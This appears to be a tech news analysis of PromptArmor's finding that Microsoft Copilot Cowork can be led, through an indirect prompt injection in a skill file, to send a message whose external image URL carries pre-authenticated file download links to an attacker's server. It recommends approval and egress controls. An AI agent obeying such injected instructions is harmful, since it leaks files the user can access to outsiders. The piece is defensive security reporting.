Copilot Cowork turns user permissions into a file exfiltration path via prompt injection

PromptArmor researchers described an attack on Microsoft Copilot Cowork that shows what happens when an agent gets access to data and communication channels without hard limits on sensitive actions.

An indirect prompt injection in a skill file opens a path to files

An attacker can place an indirect prompt injection inside a skill file. When a user asks Copilot Cowork for a routine task, such as a weekly work recap, the agent uses its Microsoft 365 permissions and can reach files in SharePoint or OneDrive. The key detail is in the communication layer: according to PromptArmor, Teams messages or emails sent to the active user required no confirmation step. If such a message contained an external image, opening it could trigger a request to an attacker-controlled server. The URL could carry pre-authenticated download links to files the user was allowed to access.

For enterprise teams, security stops being a question of model quality

Copilot Cowork operates with the user's permissions and accesses Microsoft Graph. That is exactly why it is useful. It is also why it becomes dangerous when the system lacks hard limits around actions that can cause data exfiltration.

For companies, the key point is that the problem is not only about model quality. Even a capable model can be manipulated if it has access to data, a channel for sending messages, and a way to create links that expose data outside the original context. Agent security moves from "does it answer correctly?" to "what can it do when it answers incorrectly?"

Approving sensitive actions and controlling egress channels are operational requirements

Enterprise agents have a legitimate place. The condition is that approval for sensitive actions, permission limits, and egress control are not optional extras. If an agent can read files, send messages, and embed external content, an attacker can build an exploit out of legitimate features.

The mitigations are not free either. PromptArmor mentions restricting SharePoint downloads, but those policies can break normal workflows. That is why agentic deployment has to be treated as a security project, not just a new feature toggle in an admin console.

Microsoft must tighten message approval and auditable egress controls

Watch how Microsoft changes approval for messages sent to the active user, how it restricts external content handling and what controls administrators get for skills stored in OneDrive. Another important signal will be whether similar attacks appear in other agents connected to email, documents and internal chat.

Lilith's verdict

An agent with Graph access is an employee holding a general power of attorney, able to open the door even when it thinks it is only sending a harmless recap message.